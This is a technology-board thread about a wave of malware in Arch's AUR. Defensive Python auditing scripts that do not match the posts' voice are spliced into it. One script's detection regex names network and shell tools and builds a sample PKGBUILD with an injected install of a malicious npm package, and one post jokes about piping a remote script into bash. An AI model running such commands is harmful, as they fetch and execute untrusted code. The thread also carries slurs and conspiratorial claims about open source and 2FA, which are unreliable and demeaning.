/g/ - Technology

More malware in the AUR, this time the ALVR package.
>>
>>109031268
if you use the AUR or think it's good you're a retard.
>>
How do you protect from info stealer malware? Do you just pray 2FA works on online accounts?
>>
>>109031293
Security keys
>>
>>109031268
Usecase of AUR?
My Gnome Linux works just fine.
>>
This is one of my concerns about Arch, I keep hearing the AUR being touted by the Arch community as a prime feature, but it seems like it's basically a Wild West frontier land where there's nearly zero oversight and basically anything goes.
>>
>>109031408
You have to be the oversight yourself.
If you cannot parse bash scripts, you shouldn't use AUR.
>>
>>109031408
who parses the pacman repo?
>>
>>109031268
Why is everything on Discord in 2026?
>>
>>109031694
Normoids.
>>
>>109031694
Ease of use, low barrier of entry, massive pre-existing userbase, lots of features, etc.
>>
>>109031711
In other words, things normoids care about.
>>
>>109031694
virgins like when they get the admin role on a platform for niggers
>>
>>109031268
I'm too lazy to vet everything and supply chain attacks are becoming more common. I moved off rolling release distros after the XZ utils attack.
>>
>>109031721
things normal people DON'T experience themselves as caring about because it's normalized
>>
>>109031268
> more malware in an unrestricted repo where anyone can upload anything at anytime

Really shocking stuff. Who would have known that you shouldn't run random executables anonymous people upload on the Internet?
>>
>>109031268
AUR is Arch's Achilles Heel. It just won't survive the (AI) malware attacks that are coming.
>>
>>109031268
>orphaned packages again
How many more times does this need to happen before the AUR takes note?
>>
>>109031404
>Usecase of AUR?
Sometimes you want something that's not in the official (yet).
For example I play the game "Factorio" and use the music service "Deezer" which have AUR packages but no official ones.
>>
>>109032312
what makes a package orphaned? not updated in a week?
>>
>>109031967
You have to be a "trusted user" to upload to the AUR.
Basically be part of a special club.
>>
>>109032341
>you dont understand, i need to UPDOOOT!
>>
>>109031268
How retarded do you have to be to be using Arch.
>>
https://gr.ht/aur_pkg_list.txt complete list of affected packages, there are over 400 of them.
>>
>>109031408
I installed Arch last year, decided to never use the AUR, and stopped using pip as I realized it was like sticking your dick in a gloryhole. I use a couple of "verified" flatpaks from flathub but that's about it.
>>
>>109031408
Well it is still better than:
>go to website that totally is ours
>click this legit exe installer
>it installs an auto-updater, a launcher, and the app
>trust us, bro, we will only check for updates on our software
This is literally the windows and often enough the MacOS experience when dealing with 3rd party software.
>>
why is npm so shit?
>>
>>109032668
They haven't even taken down the malicious package yet ffs https://www.npmjs.com/package/atomic-lockfile
>>
You run Arch, btw.
>>
>>109031292
this.
my desktop is on Arch and I have never needed the AUR in all the 9 years I have been using Arch.
>>
>>109032694
but the repo is down if you check it
>>
>>109031268
I was wondering why this never happened before.
The archfags always told me "because it's all carefully checked!" but I know how well that works.

What a surprise.
>>
>>109031292
Basically this.

>>109031404
"Usecase" is that the Official repos are pretty limited (Waterfox isn't in it but Firefox is; as an example) so you use AUR if you want a "repo-like" experience over compiling or using flatpak/appimage/snap instead.

>>109031292
At this point I really need to learn to compile things myself. I've been lazy to do it because I only need a few things that the official repo has already, but it's a good "skill" to know.
>>
>>109032647
>Download from github release
or
>Follow the link for the official website on the github page
You also get software updates as fast as the dev releases and no risk of your packager getting compromised.
>>
>>109032778
People have added malicious code to the release zips that isn't in the original repo. That's what the xz backdoor did.
>>
>endeavor
>cachyos
lmao, like clockwork, the two jeetiest arch distributions
>>
>>109031292
>wlrobs-hg
>droidcam
>dz6
>>
>>109031268
The AUR is a joke and always has been. Only the tranny element of the Arch userbase needs it, and I'm in favor of them getting malware.
>>
>>109032778
I still trust the AUR more than rando GitHubs.
One of the functions of the AUR is to scan packages for malware and test they don't cause other major issues.
Anyone can put anything on GitHub but only selected people can upload to the AUR.
>>
>>109032778
Github accounts and official websites get compromised and serve malware all the time. So do third party download sites like Fosshub. If you're retarded enough to think you're safe just because you're downloading from a "trusted" website then you probably already have malware installed. CPU-Z downloads were replaced with malware on the official site just a couple of months ago, and basically everybody who owns a PC has that installed.

https://www.techpowerup.com/348138/security-psa-popular-tools-cpu-z-and-hwmonitor-were-briefly-compromised
>>
>>109031268
I love the AUR in theory, it's the ultimate freedom and doesn't care about free/non-free, just packages for users. But this isn't the first time Malware has been uploaded and it won't be the last time.

There are some official AUR packages directly from the Dev, like RPCS3. Please always check out your favorite App before. Also, the AUR should notify the user "this package changed ownership"
>>
>>109031268
fuck, and I've used alvr, not on my arch machine tho
they should make a separate AUR for malware so i can use the normal one
>>
>>109032644
Good choice, I recently thought about Pip and it seems like this shit is just as dangerous, probably even more so, because it's so popular.
>>
>>109033022
Exactly.

People make a big deal about malware in the AUR because it hardly ever happens.
Meanwhile all the Wintodlers currently have a zero day because some sperg picked a fight with Microsoft (and probably rightfully so).
>>
>>109031293
>>109031379
The Info Stealer would just steal your session token instead. 2FA is worthless here. The first thing they grab is your browser cookies.
2FA didn't prevent those Microsoft employees from getting their stuff taken over on github and 2FA didn't stop all those ecelebs from getting their youtube channels stolen.
>>
>>109033028
If I had to design the system I would make it so at least 3 people who don't really know each other have to approve a package/update before release.
Let each of them scan for malware before giving the green light.

Not sure how it actually works though?
Is it just one person responsible per package?
>>
>>109032332
>For example I play the game "Factorio" and use the music service "Deezer"
You should only use FLOSS software and play FLOSS games, and listen to media which is out of copyright. Like Vivaldi phonograph cylinders. This is your fault for not keeping a clean system running something like Trisquel.
>>
So what should a pleb do?

Use only pacman and flatpaks?
>>
>>109033000
>but only selected people can upload to the AUR
What? It is basically: make an account and push a git repo. There is no gate.
>>
>>109033114
That is the mentality of the spergs maintaining the official repository, yes:
>You choose not to use Microslop so you must be against paying anyone for their work.
And that's exactly why we need the AUR.
>>
>>109033161
Don't worry too much. If you need it just install it. Regularly do a pass on stuff that you don't need and remove it again. Flatpak is trying to get universal packaging and sandboxing right, but a malicious flatpak will ask for more permissive environment and still be a problem.
There is no super pleb friendly way of sandboxing without ending up on iOS and a centralized App store.
>>
>>109033161
Doesn't really matter, anything 'official' and legit can be hijacked like CPU Z and that was on their own page. Just luck of the draw and you hope that some autist catches it before you install/update e.g. xz and the microslop autist
>>
>>109033069
Sounds good. I think it's relatively easy to take over a package, I read a couple messages in discord, but I'm not sure how it works exactly.

AUR build scripts should just be the exact copy of the original build from github to build on Arch, maybe some small fixes. There should be automation, so it only pulls the original project. But some builds are buggy and need manual fixes and dependencies, so I don't know how that would work. 3 people checking the package sounds good, but there are so many packages available, I don't think that's an option for a community distro.
>>
Arch devs need to get rid of the AUR.
>>
>>109031268
Arch is not a serious distro. I do appreciate Arch users for their beta testing of the kernel, however.
>>
>>109033292
xz was surprisingly a one off. The best thing to do is not use the AUR or switch distros.
>>
>>109031408
>but it seems like it's basically a Wild West frontier land where there's nearly zero oversight and basically anything goes.
PKGBUILDs are just install scripts; you're supposed to eyeball the fucking install script before you use it. If you see it going to some sketched out source then don't install the shit.
>>
>>109031268
>sees thread
>wtf is alvr?
>looks it up
>"Stream VR games from your PC to your headset via Wi-Fi "
>wow. that AUR attack must have affected MILLIONS of people, i tell ya
>most comments are, as always, /g/eet wintards who know fuck all
>>
>>109033351
xz was found. You obviously don't know about stuff that is not.
>>109033441
The script might look fine and something else is compromised. You never know from looking at a script.
>>
>Anyone can take over an Aur if the original author doesn't respond in two weeks.
Holy fuck that's retarded.
>>
I thought I had more stuff from the AUR installed but surprisingly do not. Still gonna start culling stuff I am not using now.
>>
>>109031404
There isn't one. Arch and all the dogshit forks of Arch are for retards and trannies.
>>
>>109032748
>I was wondering why this never happened before.
it's happened like three different times in the last year or so
>>
>>109033802
I mean, xz would have been found at some point. If it hadn't been found by that dude on Debian sid, it would have been found when it entered production. It's pretty hard to hide that kind of shit when most of the world's webservers run on Linux and a bunch of dudes get paid ridiculous money to protect the billion dollar industries that run on said servers.
>>
>>109032726
>>109031292
I use it for like three packages and that's it. I don't see how it's a big deal.
>>
i am unironically switching off archlinux after this. xz was an eyebrow raiser but now this is kind of a wake up call. these supply chain attacks are such a common occurrence that even sticking to official repos makes me uncomfortable. just gonna use debian and embrace being 1 year behind everything but at least i'll have some peace of mind
>>
>>109034856
You should take the nix pill.
>>
>>109034859
nixos is even worse. there is a layer of bullshit slapped in front of every package so it can be interfaced through the nixos configuration language. nixpkgs review process is also spamming their discord begging for overworked trannies to approve your PR. it's a matter of time before something slips there. best is to just use a distro like fedora or debian and stay on stable branches, let the people on rawhide or sid be the safety net
>>
>>109034859
that's a troon pill
>>
>>109034997
no wait arch is one too
you will overdose
>>
>>109031268
Arch needs to remove AUR. It's a trashfire. I don't care how much disclaimers they have about it not being "official", it's hosted on their main site and is linked from the main page. You can't play this game where you pretend AUR is not a part of the Arch repository, but when I complain about a package not being on Arch (they have the smallest repository of any major distro), you point me to the AUR. You can't have your malware-infested cake and eat it too.
>>
>>109031268
ALVR, DUDE, HOW SCARY!!!
>>
>>109034665
Last times it happened, it was with fake packages aping legitimate ones with similar names. This time the hackerman just swooped up a bunch of orphaned AUR packages (there is nothing stopping anyone from doing this).
>>
>>109031268
>>109032726
I can see where you're coming from but what's the point of Arch without the AUR? It's just Debian testing or Gentoo without portage.
>>
>>109032668
>not at least locking down to a specific npm package version

software developers are the jeets of software
>>
>>109031292
>>109032726
I am a lazy sack of shit and I find makepkg to be convenient.
>>
Switched to Fedora about a month ago after over 6 years of Arch usage. Good call.
>>
Ok I seem to be clean (for now), I installed very few aur packages this year anyway.
No atomic-lockfile in "sudo npm list -g --depth=9999" and I ran https://gist.github.com/Kidev/59bf9f5fb53ab5eee99f19a6a2fc3992#file-aur_check-sh which spit out:
Checking for infected AUR packages (446 total)...

WARNING: 1 infected package(s) found:
- python-future

which made me panic before realizing that I had that installed from official repo in 2024 before package was moved to aur.
Still, this feels shady as fuck. More and more malware, certain obsolete design decisions like how AUR repo works and LLMs empowering script kiddies, make it feel like a question of when rather than if there is going to be a great pwning. I feel like Pewds video cursed Arch by making it a much more attractive target.
Maybe I should move on to Gentoo autism or something.
I am not feeling safe and I don't think I am being paranoid.
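The false positive in the post above (a package that was installed from an official repo before it moved to the AUR) is exactly the case a name-only check against an "affected packages" list cannot tell apart. Pacman does keep enough metadata to tell: a package file installed from a signed repository reports `Validated By : Signature`, while a package you built with makepkg (directly or through an AUR helper) has no signature and, unless PACKAGER is set in makepkg.conf, reports `Unknown Packager`. The script below is an added example for this thread, not code from the Arch project or from the gists linked in the thread; it parses the text of `pacman -Qi <pkg>...`, and the sample output, packager name, versions and dates are constructed.

```python
"""Work out where an installed package actually came from before treating a
hit on an 'affected AUR packages' list as a compromise.

Added example for this thread (not Arch project code). Parses `pacman -Qi`
text; SAMPLE_QI below is a constructed sample, not real output."""
import re
from dataclasses import dataclass


@dataclass
class InstalledPkg:
    name: str
    version: str
    packager: str
    validated_by: str
    build_date: str


def parse_pacman_qi(text: str) -> dict[str, InstalledPkg]:
    """Parse the 'Key : Value' blocks pacman -Qi prints, one blank-line-separated
    block per package. Indented lines are continuations (e.g. Optional Deps)
    and are skipped; values such as dates may themselves contain colons, so
    only the first colon splits key from value."""
    pkgs: dict[str, InstalledPkg] = {}
    for block in re.split(r"\n\s*\n", text.strip()):
        fields: dict[str, str] = {}
        for line in block.splitlines():
            if not line or line[0].isspace() or ":" not in line:
                continue
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        if "Name" in fields:
            pkgs[fields["Name"]] = InstalledPkg(
                name=fields["Name"],
                version=fields.get("Version", ""),
                packager=fields.get("Packager", ""),
                validated_by=fields.get("Validated By", ""),
                build_date=fields.get("Build Date", ""),
            )
    return pkgs


def origin(pkg: InstalledPkg) -> str:
    """Classify provenance from the two fields that survive installation."""
    if pkg.validated_by == "Signature":
        return "signed repo build"          # came from a pacman repo, not makepkg
    if pkg.packager == "Unknown Packager":
        return "built locally"              # makepkg / AUR helper on this machine
    return f"unsigned build by {pkg.packager}"


def triage(qi_output: str, affected: set[str]) -> dict[str, str]:
    """Map each installed package that appears on the affected list to its origin."""
    installed = parse_pacman_qi(qi_output)
    return {name: origin(p) for name, p in installed.items() if name in affected}


# Constructed sample: a signed repo build from 2024 and a local makepkg build.
SAMPLE_QI = """\
Name            : python-future
Version         : 1.0.0-1
Description     : constructed sample entry
Architecture    : any
Packager        : Example Dev <dev@example.org>
Build Date      : Tue 12 Mar 2024 10:11:12 AM UTC
Install Date    : Wed 13 Mar 2024 08:00:00 AM UTC
Install Reason  : Explicitly installed
Validated By    : Signature

Name            : alvr
Version         : 1.0.0-1
Description     : Stream VR games from your PC to your headset via Wi-Fi
Architecture    : x86_64
Optional Deps   : steam: run SteamVR [installed]
Packager        : Unknown Packager
Build Date      : Mon 03 Feb 2025 07:30:00 PM UTC
Install Date    : Mon 03 Feb 2025 07:35:00 PM UTC
Install Reason  : Explicitly installed
Validated By    : None
"""
AFFECTED = {"python-future", "alvr", "wlrobs-hg"}  # constructed list

if __name__ == "__main__":
    for name, where in triage(SAMPLE_QI, AFFECTED).items():
        print(f"{name}: {where}")
```

Feed it `pacman -Qi $(pacman -Qqm)` for the foreign packages plus anything else on the list. A "signed repo build" hit means the package on your disk never passed through the AUR; for a "built locally" hit, compare the Build Date with the date the package was taken over: a build that predates the takeover was made from the earlier PKGBUILD, but anything rebuilt or updated after it needs the PKGBUILD and the package contents checked.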
>>
>>109035489
>I can see where you're coming from but what's the point of Arch without the AUR?
I don't know, I just never needed it, everything I have installed comes from the original repos and my Arch machine is my gaming machine so there's not much needed.
>>
>>109035762
That's why you install AUR helpers (either paru or yay) that automatically inform you of shit like that. Every time the main repos drop a package it always pops up here and I clean that shit up. New AUR updates always show me a diff between old and new version and the npm install atomic-lockfile line would have stuck out like a sore thumb.
>>
so what am I supposed to do now? am I supposed to actually go on the github repo of the project I want to install and literally read the #installation area of the README? like a caveman?
>>
not my problem
>>
>>109033764
It isn't just one package. There are over 400 packages which have been confirmed compromised so far.
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/
Looks like you were the fucking retard after all, anon.
>>
>>109031292
/thread
>>
>>109033000
>One of the functions of the AUR is to scan packages for malware
wow
>>
>>109032644
What about uv? It uses the same packages I think?
>>
>>109035944
I rarely use AUR but... just check the files before running makepkg? You can even direct your most capable LLM to verify them for you but usually there isn't much to check.
>>
>>109032332
why the fuck do you need a userpackage for factorio? it's closed source and they already provide official linux binaries
>>
I only install software via
>curl -fsSL https://trustworthy.com/install.sh | bash
I think I'll be safe.
>>
do we know the timeline of the malicious packages? I formatted 5 days ago barely have any packages installed yet but I might have been fucked before that
>>
>>109035944
You are supposed to go to the github page and check if the PKGBUILD from AUR uses the same repo and check if it isn't doing something too different from the instructions in the readme.
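The check described above, turned into a script, as an added example for this thread (not code from the AUR, makepkg or any helper). It expands the variables a PKGBUILD's `source=()` array normally uses (`$pkgname`, `$pkgver`, `$url`), understands makepkg's `localname::url` and `git+https://` forms, and compares every remote source against the upstream repo URL you found on the project's GitHub page. Files with no URL live in the AUR git repo itself and are listed separately because they still need reading. The PKGBUILD and the upstream URL in the sample are constructed (a hypothetical example-org/example-app).

```python
"""Check that a PKGBUILD's sources really come from the upstream project you
looked up, and list the files shipped in the AUR repo that you must read.

Added example for this thread; SAMPLE_PKGBUILD and UPSTREAM are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Simple scalar assignments: pkgname=foo, pkgver=1.2, url="https://..."
ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)=([\"']?)([^\"'()\n]*)\2\s*$", re.M)
# source=( ... ) and source_<arch>=( ... ), possibly spanning several lines
SRC_ARRAY_RE = re.compile(r"^source(?:_\w+)?=\((.*?)\)", re.S | re.M)
TOKEN_RE = re.compile(r"\"([^\"]*)\"|'([^']*)'|(\S+)")
VAR_RE = re.compile(r"\$\{?(\w+)\}?")


@dataclass
class SourceFinding:
    entry: str        # the source entry as written in the PKGBUILD
    url: str | None   # expanded URL, or None for a file in the AUR repo
    status: str       # "upstream", "foreign" or "local"


def shell_vars(pkgbuild: str) -> dict[str, str]:
    """Collect scalar assignments so $pkgname / ${pkgver} / $url can be expanded."""
    return {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(pkgbuild)}


def expand(value: str, vars_: dict[str, str]) -> str:
    for _ in range(3):  # assignments may themselves reference other variables
        value = VAR_RE.sub(lambda m: vars_.get(m.group(1), m.group(0)), value)
    return value


def source_entries(pkgbuild: str) -> list[str]:
    """Every entry of the source arrays, with shell quoting removed."""
    entries = []
    for arr in SRC_ARRAY_RE.finditer(pkgbuild):
        for m in TOKEN_RE.finditer(arr.group(1)):
            tok = m.group(1) or m.group(2) or m.group(3)
            if tok and not tok.startswith("#"):
                entries.append(tok)
    return entries


def _norm_path(path: str) -> str:
    return path.rstrip("/").removesuffix(".git")


def audit_sources(pkgbuild: str, upstream: str) -> list[SourceFinding]:
    """Compare each remote source with the upstream repo URL (host and repo path)."""
    up = urlparse(upstream)
    up_path = _norm_path(up.path)
    vars_ = shell_vars(pkgbuild)
    findings = []
    for entry in source_entries(pkgbuild):
        # makepkg syntax: "localname::url"; VCS sources look like git+https://...
        target = entry.split("::", 1)[1] if "::" in entry else entry
        target = expand(target, vars_)
        if "://" not in target:
            findings.append(SourceFinding(entry, None, "local"))
            continue
        u = urlparse(target)              # "git+https" scheme parses fine
        path = _norm_path(u.path)
        same_host = u.netloc.lower() == up.netloc.lower()
        under_repo = path == up_path or path.startswith(up_path + "/")
        status = "upstream" if same_host and under_repo else "foreign"
        findings.append(SourceFinding(entry, target, status))
    return findings


# Constructed sample: one upstream tarball, one local file, one foreign download.
SAMPLE_PKGBUILD = """\
# Maintainer: someone <someone@example.org>
pkgname=example-app
pkgver=1.2.3
pkgrel=2
pkgdesc="Constructed sample"
arch=('x86_64')
url="https://github.com/example-org/example-app"
license=('MIT')
source=("$pkgname-$pkgver.tar.gz::$url/archive/v$pkgver.tar.gz"
        "$pkgname.desktop"
        "helper.sh::https://cdn.example-files.net/helper.sh")
sha256sums=('SKIP' 'SKIP' 'SKIP')
"""
UPSTREAM = "https://github.com/example-org/example-app"

if __name__ == "__main__":
    for f in audit_sources(SAMPLE_PKGBUILD, UPSTREAM):
        print(f"{f.status:9} {f.entry}")
```

A "foreign" entry is not automatically malicious (mirrors and separate asset hosts exist), but it has to be explained by the upstream README before you build; "local" entries are the patches and helper scripts in the AUR git repo, which is where payloads get hidden, so read them along with the `prepare()`/`build()`/`package()` functions. The parser only handles the plain assignment forms shown; a PKGBUILD that computes sources with shell logic is a reason to read it by hand anyway.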
>>
>>109033053
Correct. Only way to prevent this is if the service in question were to not use session cookies but would require access tokens with each request, which continue to be generated by a hardware key. FIDO/WebAuthn-compatible keys actually support a hands-off mode for repeat generation of access tokens for as long as session remains open, so this is completely possible. But it requires that your entire session management solution is constructed around it to be properly supported and at no point whatsoever attempts to reconcile various login strategies and session management strategies to the lowest common denominator, that being a session cookie. Meaning the TL;DR here is: possible, but never happening.
>>
>>109031268
>>
>>109031268
AUR is such a success story, it's an amazing tool for regular users and developers alike. That's why it's targeted so much. You can cry but it's here to stay.
>>
>>109033441
you do realise they can buy the domain name if a dev forgets or it lapses and you'll have no way of knowing
>>
>>109031686
The maintainers and trusted users who have to show a track record of good packaging in AUR first.
>>
>>109032341
The maintainer disowns it, or if they aren't active anymore someone can request it is disowned from them if it's been marked out of date for 2 weeks, with a definite success if it's been out of date for 6 months.
There are security scanners that can check if a package has been orphaned and then adopted by someone whose changes you haven't checked yet, and tell you to apply extra scrutiny, but they aren't very good, and they aren't commonly used.
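The kind of scanner the post above describes, as an added example for this thread (not the AUR's code and not any existing helper's). It keeps a snapshot of the maintainer and `LastModified` value you saw when you last read each package's PKGBUILD, then compares that with what the AUR RPC (v5, `type=info`) reports now: an orphaned package, a different maintainer, a modification since your review, or a package that has vanished from the AUR (removed packages are themselves a signal). The RPC response below is a constructed sample in the documented v5 shape with hypothetical maintainer names and timestamps.

```python
"""Flag installed AUR packages that were orphaned, re-adopted by someone else,
or modified since you last reviewed them, using the AUR RPC info fields.

Added example for this thread; SAMPLE_RPC and SNAPSHOT are constructed."""
import json
from dataclasses import dataclass
from urllib.parse import quote

AUR_RPC = "https://aur.archlinux.org/rpc/"


def info_url(names: list[str]) -> str:
    """Build the multi-package info query; batch if you have hundreds of names,
    since this is a GET whose length grows with the list."""
    return AUR_RPC + "?v=5&type=info&" + "&".join("arg[]=" + quote(n) for n in names)


@dataclass(frozen=True)
class Finding:
    name: str
    reason: str


def review_needed(rpc_body: str, snapshot: dict[str, dict]) -> list[Finding]:
    """snapshot maps package name -> {"maintainer": str|None, "last_modified": int}
    recorded when you last read that package's PKGBUILD and sources."""
    results = {r["Name"]: r for r in json.loads(rpc_body)["results"]}
    findings = []
    for name, seen in snapshot.items():
        cur = results.get(name)
        if cur is None:
            findings.append(Finding(name, "no longer in the AUR (deleted or renamed)"))
            continue
        if cur["Maintainer"] is None:
            findings.append(Finding(name, "orphaned: anyone can adopt it"))
        elif cur["Maintainer"] != seen["maintainer"]:
            findings.append(Finding(
                name, f"maintainer changed: {seen['maintainer']} -> {cur['Maintainer']}"))
        if cur["LastModified"] > seen["last_modified"]:
            findings.append(Finding(name, "modified since your last review"))
    return findings


# Constructed RPC v5 response: unchanged, re-adopted, orphaned; pkg-d is gone.
SAMPLE_RPC = json.dumps({
    "version": 5, "type": "multiinfo", "resultcount": 3,
    "results": [
        {"Name": "pkg-a", "PackageBase": "pkg-a", "Version": "2.0-1",
         "Maintainer": "alice", "OutOfDate": None, "LastModified": 1700000000},
        {"Name": "pkg-b", "PackageBase": "pkg-b", "Version": "1.1-3",
         "Maintainer": "mallory", "OutOfDate": None, "LastModified": 1700500000},
        {"Name": "pkg-c", "PackageBase": "pkg-c", "Version": "0.9-1",
         "Maintainer": None, "OutOfDate": 1690000000, "LastModified": 1650000000},
    ],
})
# Constructed snapshot from the last time these PKGBUILDs were read.
SNAPSHOT = {
    "pkg-a": {"maintainer": "alice", "last_modified": 1700000000},
    "pkg-b": {"maintainer": "bob", "last_modified": 1690000000},
    "pkg-c": {"maintainer": "carol", "last_modified": 1650000000},
    "pkg-d": {"maintainer": "dave", "last_modified": 1680000000},
}

if __name__ == "__main__":
    print(info_url(list(SNAPSHOT)))
    for f in review_needed(SAMPLE_RPC, SNAPSHOT):
        print(f"{f.name}: {f.reason}")
```

In real use, fetch `info_url(...)` for the output of `pacman -Qqm`, and rewrite the snapshot entry only after you have read the new PKGBUILD. The RPC only exposes the current maintainer, not who pushed what; for that, clone the package repo (`git clone https://aur.archlinux.org/<pkgbase>.git`) and read `git log`. "Maintainer changed" together with "modified since your last review" is the orphan-takeover pattern the thread is about.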
>>
>>109035678
me too up until recently but all the thirdies realizing that they can just supply chain attack means we can't have nice things.
>>
>>109032606
Where's this list come from and how was it generated? I'm seeing plenty of packages in there which are completely fine. No malware.
>>
>>109032748
Who told you that? Every time it happens the developers essentially say "surprised it doesn't happen more. On AUR, you are on your own." and it's true. The only person you can trust to carefully check AUR PKGBUILDs is yourself.
>>
>>109033000
Not true in the slightest. To be as charitable as possible you are maybe thinking of Chaotic AUR, which does check for malware and does have a limited set of people who can check packages. If you're so reliant on Chaotic AUR that you think of it as just "AUR" though you have other misunderstandings.
>>
>>109037622
Anon... Do you really believe anything you just said? This is open source tech, it will always be compromised or shit. Nothing in between. What is the other incentive for a person to make sure open source free (as in free beer) software runs fine, other than planting malware in there?
Sometimes I don't understand people. Is this a consequence of some commie propaganda or what? Why would anyone believe that complicated niche software is done for free? At best it is done by corpos, who have absolute control over it and just allow you to use it, while actually using you like a beta tester (think Fedora Linux, Ubuntu and such).
Nobody does anything worthy and complicated for free. Because it takes effort. Nobody would waste their only life for your benefit, for free, for nothing in return.
>>
Same thing is happening to Fedora and probably every other Linux distribution as well. Really, open source development where anyone can contribute is probably done now that social engineering to compromise supply chains can be automated at scale.
>>
>>109038171
It was always like that, in fact easier before, because now you'd check for random people trying to contribute trash. In the past any activity felt like blessing, so building trust was way easier for bad actors. There is no open source piece of software in the world that is widely used, but not compromised by at least 3-4 agencies from different countries.
>>
>>109032775
>At this point I really need to learn to compile things myself. I've been lazy to do it because I only need a few things that the official repo has already, but it's a good "skill" to know.
hope you like tracking down cmake errors
>>
my fedora couldn't stop winning
*tips*
>>
>>109031268
Got a funny story to share.
>Be me
>Last night in the bathroom
>Took a massive Arch
>Wiped my Artix
>Flushed the Cachy
>Cachy got stopped up by the massive log of Arch
>Had to plunger the Cachy three times
>The log of Arch was so big it hurt my Artix for a while after
What a night in the bathroom!
Did you like my true story?
>>
>>109038171
fedora has user maintained repos?
>>
>>109038713
Your mom is a user maintained repo. Where do you think she gets the money for your Dino Nuggies, Captain Chud?
>>
>>109038240
kek
>>
keepASS infected!
>>
>>109039155
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/message/5FDTMKA54RMWNRHJFUAKXEBAFV5WPDUL/
>>
>>109039159
almost 900 packages
>>
Maybe it's time to give NixOS a try...
>>
>>109031268
dont care
havent updated in months
>>
>>109031630
>just manually verify every update, bro
No wonder Arch has a reputation as a distro for NEETs.
>>
>>109039257
>just manually verify each line of code in each update bro
Arch trannies are the worst
>>
>>109039257
You only have to check the diffs after you've installed a package, and 9 times out of 10 it's just the pkgver and checksum variables changing. Takes maybe 1 minute per week. You and I both waste more time on 4chan. I waited longer to get a captcha and make this post than I took verifying diffs.
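The one-minute check described above, as an added example for this thread (not paru's or yay's diff view). It diffs the old and new PKGBUILD, classifies every changed line as routine (pkgver, pkgrel, epoch, checksum arrays), as needing a look (anything else, including a checksum replaced by SKIP, which removes the pin on the downloaded source), or as suspicious (downloads, package-manager installs, eval, base64, writes into the user's home, and similar things a tarball-or-git build rarely needs). The two PKGBUILD versions are constructed; the injected `npm install` line mimics what the thread describes and is not the real malicious commit.

```python
"""Triage a PKGBUILD update diff: separate the routine version/checksum bump
from lines that need a human eye, and highlight lines that fetch or execute
things at build time.

Added example for this thread; OLD / NEW_BUMP / NEW_INJECTED are constructed."""
import difflib
import re

ROUTINE_RE = re.compile(
    r"^(pkgver|pkgrel|epoch)=\S+$"                                   # version bump
    r"|^(md5|sha1|sha224|sha256|sha384|sha512|b2)sums(_\w+)?=\("    # checksum array
    r"|^['\"]?[0-9a-f]{32,128}['\"]?\)?$",                          # checksum continuation
    re.I,
)
# Things a PKGBUILD for a normal tarball-or-git build rarely needs to do.
SUSPICIOUS_RE = re.compile(
    r"\b(curl|wget)\b|npm install|pip install|cargo install|base64|\beval\b"
    r"|/dev/tcp|\bnc\b|\.bashrc|\.profile|\.config/autostart|systemctl --user"
    r"|crontab|\$HOME|~/",
    re.I,
)


def classify_line(diff_line: str) -> str:
    """diff_line is a '+' or '-' line from a unified diff."""
    body = diff_line[1:].strip()
    if not body or body.startswith("#"):
        return "routine"
    if SUSPICIOUS_RE.search(body):
        return "suspicious"
    # Replacing a real checksum with SKIP removes the pin on the downloaded source.
    if diff_line.startswith("+") and re.search(r"\bSKIP\b", body):
        return "review"
    if ROUTINE_RE.match(body):
        return "routine"
    return "review"


def triage_diff(old: str, new: str) -> tuple[str, list[tuple[str, str]]]:
    """Return (verdict, [(class, diff_line), ...]) for every added/removed line;
    verdict is 'routine', 'review' or 'suspicious' (worst class wins)."""
    changed = []
    for line in difflib.unified_diff(old.splitlines(), new.splitlines(), lineterm="", n=0):
        if line.startswith(("+++", "---")) or line[0] not in "+-":
            continue
        changed.append((classify_line(line), line))
    order = {"routine": 0, "review": 1, "suspicious": 2}
    verdict = max((c for c, _ in changed), key=order.get, default="routine")
    return verdict, changed


# Constructed PKGBUILD: @HASH@ stands in for a 64-hex sha256 value.
OLD = """\
pkgname=example-app
pkgver=1.2.3
pkgrel=1
url="https://github.com/example-org/example-app"
source=("$url/archive/v$pkgver.tar.gz")
sha256sums=('@HASH@')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  install -Dm755 example-app "$pkgdir/usr/bin/example-app"
}
""".replace("@HASH@", "a" * 64)
# A normal update: version and checksum change, nothing else.
NEW_BUMP = OLD.replace("pkgver=1.2.3", "pkgver=1.2.4").replace("a" * 64, "b" * 64)
# The same bump with an extra install step slipped into build().
NEW_INJECTED = NEW_BUMP.replace("  make\n", "  npm install -g atomic-lockfile\n  make\n")

if __name__ == "__main__":
    for label, new in (("bump", NEW_BUMP), ("injected", NEW_INJECTED)):
        verdict, lines = triage_diff(OLD, new)
        print(f"{label}: {verdict}")
        for cls, line in lines:
            print(f"  [{cls:10}] {line}")
```

Run it on the PKGBUILD your helper cached for the installed version against the one it just fetched (the same two files its "show diff" prompt compares), and treat anything other than "routine" as a reason to stop and read the whole file, including any `.install` script and local source files, which this diff of the PKGBUILD alone does not cover. The patterns are a starting list, not a detector: a payload can be staged in a source tarball the PKGBUILD merely unpacks, which is why the checksum and source-host lines still matter.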
>>
>>109039419
Did it take longer than coming to 4chan to tell lies?
>>
>>109039426
What part of my post do you take issue with?
>>
>>109031292
If arch had proprietary packages in their official repos it wouldn't be needed, but for shit like vscode or any proton that's not included into steam it's a requirement.
>>
>>109031268
>corporate hacking is now just targeting free software
Saw this coming. No way will corporations just let free software just exist when they need to shill their AI garbage for the sake of their asset portfolios.

>>109031293
2FA is just a method of triangulating you for the sake of advertisement, indoctrination and exploitation. That's why they pushed it hard post covid.

>>109033053
2FA arguably made more threat vectors in most systems. You've added a 2nd stdin point to cause exploits to happen. Furthermore, you've potentially added more personal information as part of 2FA that can triangulate who you are and what you are doing.
>>
>>109035762
At least this exploit got caught.
With closed source they never even get caught because nobody checks.
>>
>>109036203
You think that's bad, Windows anti-malware has had numerous forms of malware.
>>
>>109038171
You're correct, the only method of preventing these things is to prevent proprietary AI full stop.
>this will never happen

Guess we're just slaves to machines then.
>>
>>109039313
This is why windows is nothing but malware nowadays.
>nooooo I must have my bloat
>>
I thought Linux couldn't get viruses like anac
>>
>>109031268
Fedora doesn't have this issue
>>
>>109039511
I'll bet it does, but people using Fedora never check it.
